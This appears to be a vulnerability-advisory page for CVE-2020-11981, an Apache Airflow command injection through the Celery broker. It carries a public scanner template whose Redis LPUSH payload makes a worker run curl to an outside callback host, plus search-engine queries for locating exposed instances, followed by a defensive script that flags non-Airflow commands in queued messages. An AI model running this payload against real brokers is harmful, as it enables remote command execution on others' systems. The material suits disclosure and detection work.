CVE-2020-11981: Apache Airflow <=1.10.10 - Command Injection

Date: 2025-08-01 | Affected software: Apache Airflow | PoC: Public

Vulnerability description

An issue was found in Apache Airflow versions 1.10.10 and below. When using CeleryExecutor, if an attacker can connect to the broker (Redis, RabbitMQ) directly, it is possible to inject commands, resulting in the celery worker running arbitrary commands.

PoC code [public]

id: CVE-2020-11981

info:
  name: Apache Airflow <=1.10.10 - Command Injection
  author: pussycat0x
  severity: critical
  description: |
    An issue was found in Apache Airflow versions 1.10.10 and below. When using CeleryExecutor, if an attacker can connect to the broker (Redis, RabbitMQ) directly, it is possible to inject commands, resulting in the celery worker running arbitrary commands.
  impact: |
    Successful exploitation of this vulnerability allows an attacker to execute arbitrary commands on the target system.
  remediation: Upgrade apache-airflow to version 1.10.11 or higher.
  reference:
    - https://github.com/apache/airflow/pull/9178
    - https://github.com/vulhub/vulhub/tree/master/airflow/CVE-2020-11981
    - https://lists.apache.org/thread.html/r7255cf0be3566f23a768e2a04b40fb09e52fcd1872695428ba9afe91%40%3Cusers.airflow.apache.org%3E
    - https://github.com/t0m4too/t0m4to
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-11981
    cwe-id: CWE-78
    epss-score: 0.90512
    epss-percentile: 0.99589
    cpe: cpe:2.3:a:apache:airflow:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: apache
    product: airflow
    shodan-query:
      - product:"redis"
      - http.title:"airflow - dags" || http.html:"apache airflow"
      - http.title:"sign in - airflow"
    fofa-query:
      - apache airflow
      - title="airflow - dags" || http.html:"apache airflow"
      - title="sign in - airflow"
    google-query:
      - intitle:"airflow - dags" || http.html:"apache airflow"
      - intitle:"sign in - airflow"
  tags: cve,cve2020,network,redis,unauth,apache,airflow,vulhub,intrusive,tcp

variables:
  data: "*3\r

    $5\r

    LPUSH\r

    $7\r

    default\r

    $936\r

    {\"content-encoding\": \"utf-8\", \"properties\": {\"priority\": 0, \"delivery_tag\": \"f29d2b4f-b9d6-4b9a-9ec3-029f9b46e066\", \"delivery_mode\": 2, \"body_encoding\": \"base64\", \"correlation_id\": \"ed5f75c1-94f7-43e4-ac96-e196ca248bd4\", \"delivery_info\": {\"routing_key\": \"celery\", \"exchange\": \"\"}, \"reply_to\": \"fb996eec-3033-3c10-9ee1-418e1ca06db8\"}, \"content-type\": \"application/json\", \"headers\": {\"retries\": 0, \"lang\": \"py\", \"argsrepr\": \"(100, 200)\", \"expires\": null, \"task\": \"airflow.executors.celery_executor.execute_command\", \"kwargsrepr\": \"{}\", \"root_id\": \"ed5f75c1-94f7-43e4-ac96-e196ca248bd4\", \"parent_id\": null, \"id\": \"ed5f75c1-94f7-43e4-ac96-e196ca248bd4\", \"origin\": \"gen1@132f65270cde\", \"eta\": null, \"group\": null, \"timelimit\": [null, null]}, \"body\": \""
  encode1: '[[["curl", "http://'
  encode2: '"]], {}, {"chain": null, "chord": null, "errbacks": null, "callbacks": null}]'
  end: '"}'

tcp:
  - inputs:
      - data: "{{data+base64(encode1+'{{interactsh-url}}'+encode2)+concat(end+ '\r

          ')}}"
        read: 1024

    host:
      - "{{Hostname}}"
      - "{{Host}}:6379"

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"

      - type: word
        part: interactsh_request
        words:
          - "User-Agent: curl"
# digest: 490a0046304402203042ee1bb66d5606440dc824360fe82e3b384031a63c2f391c36dd65352f24b302201467c787556675477b438dd536815de44968c997cd02cafa6965fed49f460e91:922c64590222798bb761d5b6d8e72950
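
A defensive check for the message shape used in the template above, as an added example that is not part of the original page or of Airflow's own code: it decodes a Celery envelope as it sits in the broker queue and flags `execute_command` tasks whose argv does not start with `airflow`. The `airflow` prefix rule, the function names and the sample messages are assumptions constructed for illustration.

```python
import base64
import json

# Task name taken from the template on this page.
EXECUTE_COMMAND_TASK = "airflow.executors.celery_executor.execute_command"
# Assumption: legitimate workers only ever receive argv lists starting with "airflow".
ALLOWED_ARGV0 = "airflow"


def extract_command(raw_message):
    """Return the argv list of an execute_command task, or None for other tasks."""
    envelope = json.loads(raw_message)
    if envelope.get("headers", {}).get("task") != EXECUTE_COMMAND_TASK:
        return None
    body = envelope.get("body", "")
    if envelope.get("properties", {}).get("body_encoding") == "base64":
        body = base64.b64decode(body).decode(envelope.get("content-encoding", "utf-8"))
    args, _kwargs, _embed = json.loads(body)  # message body is [args, kwargs, embed]
    return args[0] if args else None


def is_suspicious(raw_message):
    """True when the message is malformed or asks a worker to run a non-Airflow command."""
    try:
        command = extract_command(raw_message)
    except (ValueError, TypeError, AttributeError, LookupError):
        return True  # undecodable envelopes on the task queue deserve a look
    if command is None:
        return False
    return not (isinstance(command, list) and command and command[0] == ALLOWED_ARGV0)


def make_message(argv, task=EXECUTE_COMMAND_TASK):
    """Build a constructed sample envelope with the same fields as the template."""
    embed = {"chain": None, "chord": None, "errbacks": None, "callbacks": None}
    body = json.dumps([[argv], {}, embed])
    return json.dumps({
        "content-encoding": "utf-8",
        "properties": {"body_encoding": "base64"},
        "headers": {"task": task},
        "body": base64.b64encode(body.encode()).decode(),
    })


if __name__ == "__main__":
    # Constructed samples: one scheduler-style command, one non-Airflow command.
    samples = [["airflow", "run", "example_dag", "t1", "2020-01-01"],
               ["curl", "http://example.invalid"]]
    for argv in samples:
        print(argv[0], "->", "SUSPICIOUS" if is_suspicious(make_message(argv)) else "ok")
```

A check like this is a monitoring aid only; the remediation stated on the page is still to upgrade to 1.10.11 or higher, and the broker should not be reachable by untrusted clients.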
